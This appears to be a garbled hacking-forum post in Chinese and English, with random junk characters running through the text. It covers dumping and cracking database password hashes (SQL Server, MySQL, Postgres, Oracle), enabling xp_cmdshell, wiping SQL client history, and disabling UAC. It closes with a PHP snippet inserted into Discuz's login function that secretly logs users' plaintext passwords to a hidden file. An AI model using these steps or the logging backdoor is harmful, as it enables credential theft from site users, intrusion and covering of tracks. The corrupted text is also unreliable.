2FD54D6119FFF04129A1D72E7C3194F7284A7F3A' J3 z h! W8 x: N b: a
8 ?7 o: v+ Y a6 s, y' L" o0×0100- constant header' n8 {: Y# x2 d v W( |
34767D5C- salt7 Z) c0 c# f: J- `" {3 r# K
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash f2 Z8 k9 `+ b8 z6 W' ?
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
$ z/ F' J2 ?" ]. _: rcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash# K( V% k* ?2 a/ M% p
SQL server 2005:-
' N. w! K; t, b1 B$ e* x$ M- ?( FSELECT password_hash FROM sys.sql_logins where name='sa'
2 c! P9 Y5 Q1 ?9 |2 C, |0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
4 q3 a" K5 E* f9 P- G% D0×0100- constant header: [6 \( x# D! Y. \8 w' K3 @
993BF231-salt
' r3 R2 x+ C0 T ]% N* s$ [5 ]5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash) M# r1 j$ ^1 ]6 a3 Q) ~7 M
crack case sensitive hash in cain, try brute force and dictionary based attacks.6 ]. l% c1 O L Q! l; z# g1 @
5 e# [9 V: {* _, u! D& j* D7 I2 tupdate:- following bernardo’s comments:-
( k- r0 E2 m- @( fuse function fn_varbintohexstr() to cast password in a hex string.; n# m6 \2 I8 K" J
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins
0 _ b4 k- Y B& m8 I; F3 I# }8 x( a& y
MYSQL:-
& ]8 \8 v% `% E. V
) S% c8 y7 X- S+ S6 {4 ?5 @In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
8 j3 f( G7 u' f( L. g6 X2 ~+ D0 y8 T6 W* Y; P
*mysql < 4.19 x' Z2 O& ]* u' s4 e8 g
7 w6 j: E( h2 Q/ L! Y$ rmysql> SELECT PASSWORD(‘mypass’);5 ]* w0 E1 W& i$ E
+——————–+
& n0 _ c3 Q: L8 P1 }, ^| PASSWORD(‘mypass’) |. u" {; K a+ n5 Q7 g% \
+——————–+# X& p; T! l. L( Y
| 6f8c114b58f2ce9e |
- L& ?/ S ]' r3 U! j6 E& N- E+——————–+# P9 f; n- [/ a1 L# u+ \0 _
8 q. d% t8 |* R$ w$ n*mysql >=4.1) L+ G4 Z+ t+ V: ?( ]* u+ X0 {, a
$ y& N* W* W% D' j
mysql> SELECT PASSWORD(‘mypass’);
" U: U2 [* ] n3 @. B6 L+——————————————-+
" {! o/ {9 @8 R; a% ]| PASSWORD(‘mypass’) |
% R B- L; @" P0 U' F8 P3 t+——————————————-+) ]2 q! N3 N; b# o
| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |2 j/ V/ e" ~& ~+ }. T+ U3 z
+——————————————-+
9 Q- L- F( Y* R- y8 @& L0 _+ U0 ?* n% w/ |/ f2 ~' G1 e+ ]1 D
Select user, password from mysql.user) P' Z5 X0 u% M" M# E2 p
The hashes can be cracked in ‘cain and abel’
: i& T& D H; W! Z- p$ q: x" K+ c/ m
% @6 C8 j( [4 @) ?Postgres:- _, ]2 n& Z% B |1 Z/ U
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)
2 `( d+ x% {5 z; ?select usename, passwd from pg_shadow;# a6 Z _% u% r. ] N0 v" |! ~* N, j
usename | passwd
! p, P, X" Q/ D" @$ C——————+————————————-8 D& B' j" p/ P$ s; h
testuser | md5fabb6d7172aadfda4753bf0507ed43967 |% S2 I" L5 i, L
use mdcrack to crack these hashes:-- {( h5 W/ C- Q) c: A
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed43965 d4 R. k. m% @2 l m0 z1 b% U% H
8 ~ p. ~, K5 r3 _' _4 V
Oracle:-, Q6 x9 C: w2 J1 ?
select name, password, spare4 from sys.user$8 V$ }, o' |0 ^; Y; D
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g, @ u* |* r5 u
More on Oracle later, i am a bit bored…. D( b1 _7 R* J, v1 S
1 Q" q. C4 r A. \/ J3 y L3 R& p+ P/ C; W
在sql server2005/2008中开启xp_cmdshell
$ i# v; J& g6 R% e& l9 C* a; X: m-- To allow advanced options to be changed.1 D' ^9 h7 n6 f" h0 u: s5 D
EXEC sp_configure 'show advanced options', 1
4 r" A' x9 W3 T- t) a5 x4 L( I9 pGO& g' ?7 {4 L9 r/ Q$ A# ]
-- To update the currently configured value for advanced options.- P2 S2 \1 K+ w; O' L4 O8 H$ ^2 m
RECONFIGURE
. x6 t( u+ N5 q1 \. Q5 qGO
: l( ^1 Q$ X; Q0 Y! f2 Q; Y6 U-- To enable the feature.
% Z6 f, W& J4 ]EXEC sp_configure 'xp_cmdshell', 1
& u3 g. E6 |7 L8 ~: VGO
6 d2 B5 H) A) N8 B$ l, S-- To update the currently configured value for this feature.
9 \1 H3 k9 O1 q3 i' HRECONFIGURE% V" [ ]$ O" x6 ~9 i* P* w( y
GO
( e T* O8 V4 \8 Z0 |9 R8 qSQL 2008 server日志清除,在清楚前一定要备份。
. Y" H. j5 M# y如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:& w. }! V$ d+ O2 B6 h
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin' C, \0 p6 d0 K: |" X
* k. P, k4 f/ v* h
对于SQL Server 2008以前的版本:
* Z' n3 }( J7 N. O& `SQL Server 2005:6 F2 M8 h4 i. Y: y* T) Q, i, g
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
- ]/ x. P! R0 i7 W5 z$ LSQL Server 2000:1 ]% G' T1 n: R' a
清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。3 I, {0 S0 G. I2 x! {2 Q+ `
7 w+ e; _9 ~. z3 d6 i+ M3 o5 s
本帖最后由 simeon 于 2013-1-3 09:51 编辑3 E! E/ A1 d$ Q0 b
$ J0 w( T% p7 v6 [
1 ~4 @0 ]* d5 C) C, w1 A
windows 2008 文件权限修改
3 ]- T, \9 b) ?9 Z: O: K, I+ X1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
$ ^7 M- O G5 a+ U3 m# \9 d2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad980 T, D8 H* v, R; u. H
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
" c2 Z) ^$ G5 `% o e+ g
8 C8 P* Z8 e0 MWindows Registry Editor Version 5.00
+ d6 B" \) i1 P7 [) }. a+ ?" R[HKEY_CLASSES_ROOT\*\shell\runas]
$ e* N1 G" W* _+ e6 ]. ?% F@="管理员取得所有权"+ J# a( Z k# X
"NoWorkingDirectory"="", c( M% |. R$ w L( h5 c
[HKEY_CLASSES_ROOT\*\shell\runas\command]% ^, y4 J7 P0 [$ k% z) Z5 }, Z' w
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
" J' w5 ~' }: x. V"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
+ C) F; h) z0 e[HKEY_CLASSES_ROOT\exefile\shell\runas2]. d6 O* m# w, E1 W
@="管理员取得所有权"1 `5 b6 v3 ?" Y
"NoWorkingDirectory"=""
0 V6 s( u; }) z( l7 x[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]( j6 T" t; o. O, k( b
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"3 _9 y' V8 t. M! u h8 f9 M
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"/ E2 ~" h. [# }0 K) N1 |
& G9 c' r- i) X& `# t( Q[HKEY_CLASSES_ROOT\Directory\shell\runas]
/ o8 w* D% i) K, c1 v' c4 G! N" o@="管理员取得所有权"
7 u6 O8 [# d) f3 S* ]) s"NoWorkingDirectory"=""4 M& y# n3 L1 `; T( ~4 H
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]6 J3 S) D% X9 Z/ z1 E9 f! v
@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
1 E8 V7 P1 u4 Y"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
- l1 ~8 P7 d8 U) t5 G4 M& {' l9 r4 c, K5 _
, \' }. r, [9 x+ e' j# X. Ywin7右键“管理员取得所有权”.reg导入
( [. v, L" x, T; W二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,5 \8 p* b# p( A q
1、C:\Windows这个路径的“notepad.exe”不需要替换
+ w# U" `5 Y8 z2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
$ s& x6 z2 b# X% B3、四个“notepad.exe.mui”不要管) m' |: l, p5 |. e
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
# v& A+ ~# R9 i6 d3 P& Y9 e& @C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe” c, {% C" i' r, b6 _8 C9 b& L
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
R& Z: l1 n( x7 H6 g替换完之后回到桌面,新建一个txt文档打开看看是不是变了。8 t, ~+ _. t# o8 [& y5 ~
windows 2008中关闭安全策略:
0 G' r% H7 |: r! J7 U, ]7 n3 j0 Nreg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
' d% B! r/ D( _9 j& b8 V. a& u修改uc_client目录下的client.php 在+ H6 R9 O U7 S8 l: Z, J- q
function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {) M3 _( |1 [" Y
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php
9 W. Y2 m5 n' u0 ~你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
+ T- N* z4 H8 B* p; {* x& Oif(getenv('HTTP_CLIENT_IP')) {, L) n7 {9 O/ ^. J
$onlineip = getenv('HTTP_CLIENT_IP');2 q8 J9 R+ L% L/ q# x7 f
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {! B/ t# `: A7 E$ R2 w
$onlineip = getenv('HTTP_X_FORWARDED_FOR'); }0 c: O0 l* T% E# w* O
} elseif(getenv('REMOTE_ADDR')) {
, N, w% ^9 v, N2 W& M5 s$onlineip = getenv('REMOTE_ADDR');$ ]' G5 D4 A1 Q( C
} else {
' R) ]5 B% ~! B8 F- ~* q$ Q* l$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];/ L* ~8 q, b" h2 [) U
}
) c9 t8 y; u5 w1 Z( e $showtime=date("Y-m-d H:i:s");
: x3 k0 y5 e9 B. j, ]5 }" P $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
' L0 v2 l, u r$ m5 C% K0 ? $handle=fopen('./data/cache/csslog.php','a+');5 r; h4 N% T$ z, M3 }
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对